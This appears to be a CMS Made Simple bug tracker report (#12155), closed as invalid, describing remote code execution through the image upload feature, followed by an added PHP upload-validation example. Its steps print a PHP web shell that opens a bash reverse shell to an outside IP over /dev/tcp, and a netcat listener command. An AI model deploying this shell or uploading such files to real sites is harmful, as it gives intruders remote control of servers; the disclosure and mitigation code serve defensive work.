CMS MADE SIMPLE FORGE

CMS Made Simple Core

 

[#12155] Remote code execution via file upload functionality

Created By: Neelima Bawa (Neelima)
Date Submitted: Sat Sep 21 04:32:01 -0400 2019

Assigned To:
Version: 2.3-beta7
CMSMS Version: 2.3-beta7
Severity: Critical
Resolution: Invalid
State: Closed
Summary:
Remote code execution via file upload functionality
Detailed Description:
1) Log in as a legitimate user.
2) Go to the content tab > file manager > upload images.
3) Write a shell script in PHP:
   <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.225.52/1234 0>&1'");
4) Upload the shell file (PHP format) in upload images.
5) At this point a Netcat listener was running on my server:
   nc -l 1234
6) The shell will be executed when clicking on the uploaded PHP file.
7) After these steps, my server (IP: 192.168.225.52) received the reverse shell successfully.
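
The following is an added example, not part of the original report and not CMSMS code: a server-side allowlist check that an "upload images" handler could apply so that the file from steps 3 and 4 is rejected. The function name, the extension/MIME table and the sample files are assumptions made for illustration; it requires PHP's fileinfo extension.

```php
<?php
// Added example, not CMSMS code. Names and the allowlist below are assumptions.

const ALLOWED_IMAGE_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Returns a server-generated file name for an accepted image,
 * or null when the upload must be rejected.
 */
function accept_image_upload(string $tmpPath, string $clientName): ?string
{
    // 1. The extension must be on the allowlist (an allowlist also covers
    //    script extensions that a ".php" denylist would miss).
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGE_TYPES[$ext])) {
        return null;
    }
    // 2. The type sniffed from the bytes on disk must match the extension;
    //    the Content-Type sent by the client is never consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED_IMAGE_TYPES[$ext]) {
        return null;
    }
    // 3. The file must have a parseable image header.
    if (@getimagesize($tmpPath) === false) {
        return null;
    }
    // 4. Store under a random name with the checked extension,
    //    never under the client-supplied name.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs: a harmless PHP script and a 1x1 GIF.
$script = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($script, "<?php echo 'constructed sample';");
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));

var_dump(accept_image_upload($script, 'shell.php')); // script under its own name
var_dump(accept_image_upload($script, 'shell.gif')); // same script renamed as an image
var_dump(accept_image_upload($gif, 'pixel.gif'));    // genuine image
unlink($script);
unlink($gif);
```

Validation on upload is only one layer: the upload directory should also be served with script execution disabled, so that a file that slips through is delivered as data rather than run.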


History

Updates

Updated: 2020-11-03 14:38
state: Open => Closed

Updated: 2019-09-21 09:49
resolution_id: 5 => 9

Updated: 2019-09-21 04:54
version_id: 31633 => 31637
resolution_id: => 5
cmsms_version_id: 31633 => 31637